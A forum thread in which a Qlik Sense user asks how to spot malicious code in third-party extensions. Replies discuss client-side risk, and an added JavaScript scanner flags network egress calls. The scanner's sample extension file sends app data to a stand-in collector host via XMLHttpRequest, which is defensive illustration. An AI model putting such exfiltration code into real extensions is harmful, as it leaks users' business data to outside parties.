swarup_malli
Specialist

Can extensions carry security risk?

Hi,

I found a couple of open source extensions. But before installing them on the Qlik Sense server, I want to make sure they do not contain any trojan program that could pose a security risk.

Any tips on how to look for malicious code in extensions?

3 Replies
satishkurra
Specialist II

Make sure you are downloading from trusted sites and the websites of Qlik Partners.

Also, you can refer to Stefan Walther's website:

qlikblog.at | QlikView / Qlik Sense Blog by Stefan Walther

Alexander_Thor
Employee

So as a rule of thumb, extensions pose as much security risk as browsing to Facebook.com, Google.com or any random web page on the web.

Extensions are client-side technology, meaning they will execute within the sandbox that is the user's browser, so they can't access anything on the server or outside the normal resources a browser can access on the local machine.

The potential risk you are running is that an extension could intercept the data from an app and then pipe that to a third-party server somewhere. So I would scan for any outgoing connections such as XMLHttpRequest, WebSockets, etc.

The Qlik cookies available to steal won't reveal anything special to the attacker apart from a session id which you can lock down with extended security in your virtual proxy.
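
The scan suggested in the reply above, as an added example that is not part of the original thread: a JavaScript function that flags XMLHttpRequest, WebSocket and, going beyond the two APIs named there, other browser egress calls and hard-coded external hosts in an extension's source. The pattern list, the `allowedHosts` parameter, the function name and the sample file are assumptions made for illustration.

```javascript
// Added example: line-based static scan of extension source for network egress.
// The pattern list is an assumption: a starting set, not an exhaustive one.
const EGRESS_PATTERNS = [
  { kind: "XMLHttpRequest", re: /\bXMLHttpRequest\b/g },
  { kind: "WebSocket", re: /\bWebSocket\b/g },
  { kind: "fetch", re: /\bfetch\s*\(/g },
  { kind: "sendBeacon", re: /\bsendBeacon\s*\(/g },
  { kind: "EventSource", re: /\bEventSource\b/g },
  { kind: "jQuery ajax", re: /\$\.(?:ajax|get|post|getJSON)\s*\(/g },
  // Code built at runtime can hide a destination from a text search.
  { kind: "dynamic code", re: /\b(?:eval|atob)\s*\(|\bnew\s+Function\s*\(/g },
  { kind: "absolute URL", re: /\b(?:https?|wss?):\/\/[^\s"'`)<>]+/g },
];

// allowedHosts: hosts the reviewer has already vetted (hypothetical parameter).
function scanExtensionSource(file, source, allowedHosts = []) {
  const findings = [];
  source.split(/\r?\n/).forEach((text, i) => {
    for (const { kind, re } of EGRESS_PATTERNS) {
      for (const m of text.matchAll(re)) {
        let detail = text.trim().slice(0, 120);
        if (kind === "absolute URL") {
          // Report only the host, and skip hosts already on the allowlist.
          detail = m[0].replace(/^[a-z]+:\/\//i, "").split(/[/:?#]/)[0].toLowerCase();
          if (allowedHosts.includes(detail)) continue;
        }
        findings.push({ file, line: i + 1, kind, detail });
      }
    }
  });
  return findings;
}

// Constructed sample extension file (not taken from any real extension).
const SAMPLE = [
  'define(["qlik", "jquery"], function (qlik, $) {',
  '  return { paint: function ($element, layout) {',
  '    var rows = layout.qHyperCube.qDataPages[0].qMatrix;',
  '    var xhr = new XMLHttpRequest();',
  '    xhr.open("POST", "https://collector.example.invalid/in");',
  '    xhr.send(JSON.stringify(rows));',
  '    $element.html("<img src=\'https://cdn.example.invalid/logo.png\'>");',
  '  }};',
  '});',
].join("\n");

const report = scanExtensionSource("sample-ext.js", SAMPLE, ["cdn.example.invalid"]);
for (const f of report) console.log(`${f.file}:${f.line} [${f.kind}] ${f.detail}`);
```

Minified files arrive as one long line, so beautify them before scanning to get usable line numbers. A clean result is a triage signal rather than proof: any "dynamic code" hit means the file needs to be read by hand.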

swarup_malli
Specialist
Author

Thank you guys! Sorry for the late reply.